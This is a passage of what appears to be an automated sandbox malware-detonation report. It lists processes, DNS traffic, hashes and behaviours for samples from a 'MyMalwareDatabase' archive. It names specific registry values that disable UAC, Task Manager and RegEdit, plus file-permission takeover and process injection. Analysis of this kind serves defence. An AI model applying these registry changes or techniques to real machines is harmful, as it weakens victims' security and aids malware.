| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | N/A | tcp |
| NL | 52.142.223.178:80 | N/A | tcp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
memory/2628-0-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/2628-1-0x0000000000400000-0x00000000005CC000-memory.dmp
C:\Users\Public\Desktop\శՂⴣᏲᘨ⻔ᐦᕲ➵Ჩᚴ༙༼ㄝ▽
| MD5 | e49f0a8effa6380b4518a8064f6d240b |
| SHA1 | ba62ffe370e186b7f980922067ac68613521bd51 |
| SHA256 | 8dbd06e9585c5a16181256c9951dbc65621df66ceb22c8e3d2304477178bee13 |
| SHA512 | de6281a43a97702dd749a1b24f4c65bed49a2e2963cabeeb2a309031ab601f5ec488f48059c03ec3001363d085e8d2f0f046501edf19fafe7508d27e596117d4 |
memory/2628-177-0x0000000000400000-0x00000000005CC000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe"
Network
Files
memory/2212-1-0x0000000000400000-0x0000000000584000-memory.dmp
memory/2212-0-0x0000000000400000-0x0000000000584000-memory.dmp
memory/2212-2-0x0000000000400000-0x0000000000584000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win10v2004-20240226-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | N/A | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5036 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe"
C:\Users\Admin\AppData\Roaming\1337\Frog.exe
"C:\Users\Admin\AppData\Roaming\1337\Frog.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | N/A | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsx590F.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
C:\Users\Admin\AppData\Roaming\1337\Frog.exe
| MD5 | 41e75c80873b0ca18d56ddaba4c5aadd |
| SHA1 | 1d0423d6e66a4739db22939e1c16bcdc7eaa9746 |
| SHA256 | b7d4eef3fa0244a3618b3d60eab9a3ebaf1f8ec5cce9598d37e99b9d7a988cec |
| SHA512 | 402de19c72015fefefe02347fad8907762c991538c4ef7aa6b646c90d6fd7aadadcdb8be9f03d78a1b7cec712516faa318fde738b52dfa7b3aaa34219f2d1530 |
memory/3952-19-0x00000000008A0000-0x00000000008A1000-memory.dmp
C:\Users\Admin\AppData\Roaming\1337\php5ts.dll
| MD5 | c9aff68f6673fae7580527e8c76805b6 |
| SHA1 | bb62cc1db82cfe07a8c08a36446569dfc9c76d10 |
| SHA256 | 9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4 |
| SHA512 | c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56 |
memory/3952-24-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-25-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-26-0x00000000008A0000-0x00000000008A1000-memory.dmp
memory/3952-27-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-28-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-29-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-30-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-31-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-32-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-33-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-34-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-35-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-36-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-37-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3952-38-0x0000000000400000-0x000000000064F000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2916 wrote to memory of 796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240215-en
Max time kernel
150s
Max time network
123s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe"
Network
Files
memory/2892-0-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-1-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-2-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-3-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-4-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-5-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-6-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-7-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-8-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-9-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-10-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-11-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-12-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-13-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-14-0x0000000000E40000-0x0000000000E72000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
93s
Max time network
127s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\REGFuck.bat"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | N/A | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
150s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe"
Network
Files
memory/2344-0-0x0000000000E20000-0x0000000000E66000-memory.dmp
memory/2344-1-0x0000000074A30000-0x000000007511E000-memory.dmp
memory/2344-2-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-3-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-4-0x0000000074A30000-0x000000007511E000-memory.dmp
memory/2344-5-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-6-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-7-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-8-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-9-0x0000000005E70000-0x0000000005F70000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win10v2004-20240226-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | N/A | udp |
| N/A | 20.190.159.0:443 | N/A | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
141s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe"
Network
Files
memory/2400-0-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2400-3-0x0000000002360000-0x0000000002361000-memory.dmp
memory/2400-4-0x0000000000400000-0x000000000064F000-memory.dmp
memory/2400-5-0x0000000000400000-0x000000000064F000-memory.dmp
memory/2400-6-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2400-7-0x0000000002360000-0x0000000002361000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe"
Network
Files
memory/2196-0-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/2196-1-0x0000000000400000-0x00000000005CC000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
147s
Max time network
156s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
memory/3044-0-0x0000000000400000-0x0000000000584000-memory.dmp
memory/3044-1-0x0000000000400000-0x0000000000584000-memory.dmp
memory/3044-2-0x0000000000400000-0x0000000000584000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240215-en
Max time kernel
139s
Max time network
121s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9366).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1412).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2080).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4435).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6408).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4337).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4903).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5192).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6403).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(229).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6743).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8924).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7212).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7848).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9686).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3200).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5295).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5889).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6609).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2209).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2288).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6706).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5115).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5127).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8926).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9651).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(210).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(793).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4218).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4638).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5013).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7773).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7409).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7874).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8553).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1286).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
